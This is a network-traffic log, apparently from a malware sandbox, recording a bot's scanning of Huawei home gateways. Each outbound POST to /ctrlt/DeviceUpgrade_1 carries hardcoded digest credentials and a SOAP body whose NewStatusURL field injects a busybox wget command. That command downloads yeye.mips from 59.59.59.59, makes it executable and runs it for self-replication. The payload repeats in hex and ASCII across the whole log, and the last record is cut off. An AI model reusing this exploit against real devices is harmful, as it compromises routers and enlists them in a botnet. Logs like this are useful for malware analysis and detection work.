                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          655192.168.2.1545510197.237.9.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.614885092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          656192.168.2.1538554157.17.13.1037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.614996910 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          657192.168.2.1553512157.102.22.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.615015030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          658192.168.2.1556498157.106.235.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.615223885 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          659192.168.2.154283092.79.32.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.615241051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          660192.168.2.155785241.218.162.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.615284920 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          661192.168.2.1537010197.129.33.6937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.615336895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          662192.168.2.155822293.59.57.18537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.615360975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          663192.168.2.154043441.53.36.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.615608931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          664192.168.2.1539456157.207.24.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.616252899 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 